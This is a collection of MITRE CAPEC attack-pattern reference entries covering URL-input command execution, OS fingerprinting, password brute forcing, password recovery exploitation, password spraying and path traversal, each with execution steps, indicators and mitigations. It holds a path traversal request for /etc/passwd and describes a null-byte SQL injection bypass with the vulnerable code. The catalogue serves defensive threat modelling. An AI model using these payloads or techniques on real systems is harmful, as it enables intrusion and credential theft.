ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	212	Functionality Misuse

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

Identify web application URL inputs: Review application inputs to find those that are designed to be URLs.
Techniques
Manually navigate web site pages to identify URLs.
Use automated tools to identify URLs.

Experiment

Identify URL inputs allowing local access.: Execute test local commands via each URL input to determine which are successful.
Techniques
Manually execute a local command (such as 'pwd') via the URL inputs.
Using an automated tool, test each URL input for weakness.

Exploit

Execute malicious commands: Using the identified URL inputs that allow local command execution, execute malicious commands.
Techniques
Execute local commands via the URL input.

Prerequisites

The victim's software must not differentiate between the location and type of reference passed the client software, e.g. browser

Skills Required

[Level: Medium]

Attacker identifies known local files to exploit

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Integrity	Modify Data

Mitigations

Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.

Implementation: Ensure all configuration files and resource are either removed or protected when promoting code into production.

Design: Use browser technologies that do not allow client side scripting.

Implementation: Perform input validation for all remote content.

Implementation: Perform output validation for all remote content.

Implementation: Disable scripting languages such as JavaScript in browser

Example Instances

J2EE applications frequently use .properties files to store configuration information including JDBC connections, LDAP connection strings, proxy information, system passwords and other system metadata that is valuable to attackers looking to probe the system or bypass policy enforcement points. When these files are stored in publicly accessible directories and are allowed to be read by the public user, then an attacker can list the directory identify a .properties file and simply load its contents in the browser listing its contents. A standard Hibernate properties file contains

hibernate.connection.driver_class = org.postgresql.Driver
hibernate.connection.url = jdbc:postgresql://localhost/mydatabase
hibernate.connection.username = username
hibernate.connection.password = password
hibernate.c3p0.min_size=5
hibernate.c3p0.max_size=20

Even if the attacker cannot write this file, there is plenty of information to leverage to gain further access.

Related Weaknesses

CWE-ID	Weakness Name
241	Improper Handling of Unexpected Data Type
706	Use of Incorrectly-Resolved Name or Reference

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

[REF-416] "Core Concepts: Attack Patterns". <https://websec.io/2012/11/26/Core-Concepts-Attack-Patterns.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Phases, Description, Description Summary, References
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Phases
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated @Abstraction
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-313: Passive OS Fingerprinting

Attack Pattern ID: 313

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	224	Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The ability to monitor network communications.Access to at least one host, and the privileges to interface with the network interface card.

Resources Required

Any tool capable of monitoring network communications, like a packet sniffer (e.g., Wireshark)

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1082	System Information Discovery

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

[REF-130] Gordon "Fyodor" Lyon. "The Art of Port Scanning". Volume: 7, Issue. 51. Phrack Magazine. 1997. <http://phrack.org/issues/51/11.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References, Related_Weaknesses
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-49: Password Brute Forcing

Attack Pattern ID: 49

Abstraction: Standard

View customized information:

Description

Extended Description

A system will be particularly vulnerable to this type of an attack if it does not have a proper enforcement mechanism in place to ensure that passwords selected by users are strong passwords that comply with an adequate password policy. In practice a pure brute force attack on passwords is rarely used, unless the password is suspected to be weak. Other password cracking methods exist that are far more effective (e.g. dictionary attacks, rainbow tables, etc.). Knowing the password policy on the system can make a brute force attack more efficient. For instance, if the policy states that all passwords must be of a certain level, there is no need to check smaller candidates.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	112	Brute Force
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	16	Dictionary-based Password Attack
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	55	Rainbow Table Password Cracking
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	70	Try Common or Default Usernames and Passwords
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	565	Password Spraying
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	560	Use of Known Domain Credentials
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	561	Windows Admin Shares with Stolen Credentials
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	600	Credential Stuffing
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	653	Use of Known Operating System Credentials

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Employ Probabilistic Techniques

Execution Flow

Explore

Determine application's/system's password policy: Determine the password policies of the target application/system.

Techniques
Determine minimum and maximum allowed password lengths.
Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc.).
Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).

Exploit

Brute force password: Given the finite space of possible passwords dictated by the password policy determined in the previous step, try all possible passwords for a known user ID until application/system grants access.

Techniques
Manually or automatically enter all possible passwords through the application/system's interface. In most systems, start with the shortest and simplest possible passwords, because most users tend to select such passwords if allowed to do so.
Perform an offline dictionary attack or a rainbow table attack against a known password hash.

Prerequisites

An adversary needs to know a username to target.

The system uses password based authentication as the one factor authentication mechanism.

An application does not have a password throttling mechanism in place. A good password throttling mechanism will make it almost impossible computationally to brute force a password as it may either lock out the user after a certain number of incorrect attempts or introduce time out periods. Both of these would make a brute force attack impractical.

Skills Required

[Level: Low]

A brute force attack is very straightforward. A variety of password cracking tools are widely available.

Resources Required

Indicators

Many incorrect login attempts are detected by the system.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality	Read Data
Integrity	Modify Data

Mitigations

Implement a password throttling mechanism. This mechanism should take into account both the IP address and the log in name of the user.

Put together a strong password policy and make sure that all user created passwords comply with it. Alternatively automatically generate strong passwords for users.

Passwords need to be recycled to prevent aging, that is every once in a while a new password must be chosen.

Example Instances

A system does not enforce a strong password policy and the user picks a five letter password consisting of lower case English letters only. The system does not implement any password throttling mechanism. Assuming the adversary does not know the length of the users' password, an adversary can brute force this password in maximum 1+26+26^2+26^3+26^4+26^5 = 1 + 26 + 676 + 17576 + 456976 + 11,881,376 = 12,356,631 attempts, and half these tries (6,178,316) on average. Using modern hardware this attack is trivial. If the adversary were to assume that the user password could also contain upper case letters (and it was case sensitive) and/or numbers, than the number of trials would have been larger.

An adversary's job would have most likely been even easier because many users who choose easy to brute force passwords like this are also likely to use a word that can be found in the dictionary. Since there are far fewer valid English words containing up to five letters than 12,356,631, an attack that tries each of the entries in the English dictionary would go even faster.

A weakness exists in the automatic password generation routine of Mailman prior to 2.1.5 that causes only about five million different passwords to be generated. This makes it easy to brute force the password for all users who decided to let Mailman automatically generate their passwords for them. Users who chose their own passwords during the sign up process would not have been affected (assuming that they chose strong passwords). See also: CVE-2004-1143

Related Weaknesses

CWE-ID	Weakness Name
521	Weak Password Requirements
262	Not Using Password Aging
263	Password Aging with Long Expiration
257	Storing Passwords in a Recoverable Format
654	Reliance on a Single Factor in a Security Decision
307	Improper Restriction of Excessive Authentication Attempts
308	Use of Single-factor Authentication
309	Use of Password System for Primary Authentication

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1110.001	Brute Force:Password Guessing

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Description, Taxonomy_Mappings
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Consequences, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-50: Password Recovery Exploitation

Attack Pattern ID: 50

Abstraction: Standard

View customized information:

Description

Extended Description

Most of them use only one security question. For instance, mother's maiden name tends to be a fairly popular one. Unfortunately in many cases this information is not very hard to find, especially if the attacker knows the legitimate user. These generic security questions are also re-used across many applications, thus making them even more insecure. An attacker could for instance overhear a coworker talking to a bank representative at the work place and supplying their mother's maiden name for verification purposes. An attacker can then try to log in into one of the victim's accounts, click on "forgot password" and there is a good chance that the security question there will be to provide mother's maiden name. A weak password recovery scheme totally undermines the effectiveness of a strong password scheme.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	212	Functionality Misuse
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	560	Use of Known Domain Credentials
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	561	Windows Admin Shares with Stolen Credentials
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	600	Credential Stuffing
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	653	Use of Known Operating System Credentials

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

Understand the password recovery mechanism and how it works.

Exploit

Find a weakness in the password recovery mechanism and exploit it. For instance, a weakness may be that a standard single security question is used with an easy to determine answer.

Prerequisites

The system allows users to recover their passwords and gain access back into the system.

Password recovery mechanism has been designed or implemented insecurely.

Password recovery mechanism relies only on something the user knows and not something the user has.

No third party intervention is required to use the password recovery mechanism.

Skills Required

[Level: Low]

Brute force attack

[Level: Medium]

Social engineering and more sophisticated technical attacks.

Resources Required

For a brute force attack one would need a machine with sufficient CPU, RAM and HD.

Indicators

Many incorrect attempts to answer the security question.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Use multiple security questions (e.g. have three and make the user answer two of them correctly). Let the user select their own security questions or provide them with choices of questions that are not generic.

E-mail the temporary password to the registered e-mail address of the user rather than letting the user reset the password online.

Ensure that your password recovery functionality is not vulnerable to an injection style attack.

Example Instances

An attacker clicks on the "forgot password" and is presented with a single security question. The question is regarding the name of the first dog of the user. The system does not limit the number of attempts to provide the dog's name. An attacker goes through a list of 100 most popular dog names and finds the right name, thus getting the ability to reset the password and access the system.

phpBanner Exchange is a PHP script (using the mySQL database) that facilitates the running of a banner exchange without extensive knowledge of PHP or mySQL.

A SQL injection was discovered in the password recovery module of the system that allows recovering an arbitrary user's password and taking over their account. The problem is due to faulty input sanitization in the phpBannerExchange, specifically the e-mail address of the user which is requested by the password recovery module.

The e-mail address requested by the password recovery module on the resetpw.php page. That e-mail address is validated with the following regular expression:

if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*

(\.[a-z]{2,3})$", $email)){

A bug in the implementation of eregi() allows to pass additional character using a null byte "\0". Since eregi() is implemented in C, the variable $email is treated as a zero-terminated string. All characters following the Null Byte will not be recognized by the regular expression. So an e-mail address can be provided that includes the special character " ' " to break the SQL query below (and it will not be rejected by the regular expression because of the null byte trick). So a SQL injection becomes possible:

$get_info=mysql_query("select * from banneruser where

email='$email' ");

This query will return a non-zero result set even though the email supplied (attacker's email) is not in the database.

Then a new password for the user is generated and sent to the $email address, an e-mail address controlled by the attacker. An attacker can then log in into the system.

CAPEC-565: Password Spraying

Attack Pattern ID: 565

Abstraction: Detailed

View customized information:

Description

Extended Description

Password Spraying attacks often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications. Successful execution of Password Spraying attacks usually lead to lateral movement within the target, which allows the adversary to impersonate the victim or execute any action that the victim is authorized to perform. If the password chosen by the user is commonly used or easily guessed, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.

Password Spraying Attacks are similar to Dictionary-based Password Attacks (CAPEC-16) in that they both leverage precompiled lists (i.e. dictionaries) of username/password combinations to try against a system/application. The primary difference is that Password Spraying Attacks leverage a known list of user accounts and only try one password for each account before moving onto the next password. In contrast, Dictionary-based Password Attacks leverage unknown username/password combinations and are often executed offline against files containing hashed credentials, where inducing an account lockout is not a concern.

Password Spraying Attacks are also similar to Credential Stuffing attacks (CAPEC-600), since both utilize known user accounts and often attack the same targets. Credential Stuffing attacks, however, leverage known username/password combinations, whereas Password Spraying attacks have no insight into known username/password pairs. If a Password Spraying attack succeeds, it may additionally lead to Credential Stuffing attacks on different targets.

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	49	Password Brute Forcing
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	560	Use of Known Domain Credentials
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	561	Windows Admin Shares with Stolen Credentials
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	600	Credential Stuffing
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	653	Use of Known Operating System Credentials

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Employ Probabilistic Techniques

Execution Flow

Explore

Determine target's password policy: Determine the password policies of the target system/application.

Techniques
Determine minimum and maximum allowed password lengths.
Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).

Select passwords: Pick the passwords to be used in the attack (e.g. commonly used passwords, passwords tailored to individual users, etc.)
Techniques
Select passwords based on common use or a particular user's additional details.
Select passwords based on the target's password complexity policies.

Exploit

Brute force password: Given the finite space of possible passwords dictated by information determined in the previous steps, try each password for all known user accounts until the target grants access.

Techniques
Manually or automatically enter the first password for each known user account through the target's interface. In most systems, start with the shortest and simplest possible passwords, because most users tend to select such passwords if allowed to do so.
Iterate through the remaining passwords for each known user account.

Prerequisites

The system/application uses one factor password based authentication.

The system/application does not have a sound password policy that is being enforced.

The system/application does not implement an effective password throttling mechanism.

The adversary possesses a list of known user accounts on the target system/application.

Skills Required

[Level: Low]

A Password Spraying attack is very straightforward. A variety of password cracking tools are widely available.

Resources Required

A machine with sufficient resources for the job (e.g. CPU, RAM, HD).

Applicable password lists.

A password cracking tool or a custom script that leverages the password list to launch the attack.

Indicators

Many invalid login attempts are coming from the same machine (same IP address) or for multiple user accounts within short succession.

The login attempts use passwords that have been used previously by the user account in question.

Login attempts are originating from IP addresses or locations that are inconsistent with the user's normal IP addresses or locations.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authentication	Gain Privileges
Confidentiality Authorization	Read Data
Integrity	Modify Data

Mitigations

Create a strong password policy and ensure that your system enforces this policy.

Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-2.

Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the domain network.

Example Instances

A user selects the phrase "Password123" as their password, believing that it would be very difficult to guess. Password Spraying, leveraging a list of commonly used passwords, is used to crack this password and gain access to the account.

The Iranian hacker group APT33 (AKA Holmium, Refined Kitten, or Elfin) carried out numerous Password Spraying attacks in 2019. On average, APT33 targeted 2,000 organizations per month, with upwards of 10 million authentication attempts each day. The majority of these attacks targeted manufacturers, suppliers, or maintainers of industrial control system equipment.

Related Weaknesses

CWE-ID	Weakness Name
521	Weak Password Requirements
262	Not Using Password Aging
263	Password Aging with Long Expiration
654	Reliance on a Single Factor in a Security Decision
307	Improper Restriction of Excessive Authentication Attempts
308	Use of Single-factor Authentication
309	Use of Password System for Primary Authentication

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1110.003	Brute Force:Password Spraying

References

[REF-565] "ACSC Releases Advisory on Password Spraying Attacks". Cybersecurity and Infrastructure Security Agency (CISA). 2019-08-08. <https://www.us-cert.gov/ncas/current-activity/2019/08/08/acsc-releases-advisory-password-spraying-attacks>. URL validated: 2020-04-30.

[REF-566] Andy Greenberg. "A notorious Iranian hacking crew is targeting industrial control systems". Ars Technica. 2019-11-23. <https://arstechnica.com/information-technology/2019/11/a-notorious-iranian-hacking-crew-is-targeting-industrial-control-systems/>. URL validated: 2020-04-30.

Content History

Submissions
Submission Date	Submitter	Organization
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)
Modifications
Modification Date	Modifier	Organization
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-126: Path Traversal

Attack Pattern ID: 126

Abstraction: Standard

View customized information:

Description

Alternate Terms

Term: Directory Traversal

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	153	Input Data Manipulation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	76	Manipulating Web Input to File System Calls
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	139	Relative Path Traversal
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	597	Absolute Path Traversal
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	664	Server Side Request Forgery

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Fingerprinting of the operating system: In order to perform a valid path traversal, the attacker needs to know what the underlying OS is so that the proper file seperator is used.

Techniques
Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
Induce errors to find informative error messages

Survey the Application to Identify User-controllable Inputs: The attacker surveys the target application to identify all user-controllable file inputs

Experiment

Vary inputs, looking for malicious results: Depending on whether the application being exploited is a remote or local one, the attacker crafts the appropriate malicious input containing the path of the targeted file or other file system control syntax to be passed to the application

Exploit

Manipulate files accessible by the application: The attacker may steal information or directly manipulate files (delete, copy, flush, etc.)

Prerequisites

The attacker must be able to control the path that is requested of the target.

The target must fail to adequately sanitize incoming paths

Skills Required

[Level: Low]

Simple command line attacks or to inject the malicious payload in a web page.

[Level: Medium]

Customizing attacks to bypass non trivial filters in the application.

Resources Required

The ability to manually manipulate path information either directly through a client application relative to the service or application or via a proxy application.

Consequences

Scope	Impact	Likelihood
Integrity Confidentiality Availability	Execute Unauthorized Commands
Integrity	Modify Data
Confidentiality	Read Data
Availability	Unreliable Execution

Mitigations

Design: Configure the access control correctly.

Design: Enforce principle of least privilege.

Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement.

Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host.

Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.

Implementation: Perform input validation for all remote content, including remote and user-generated content.

Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables.

Implementation: Use indirect references rather than actual file names.

Implementation: Use possible permissions on file access when developing and deploying web applications.

Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification -- using an allowlist approach.

Example Instances

An example of using path traversal to attack some set of resources on a web server is to use a standard HTTP request

http://example/../../../../../etc/passwd

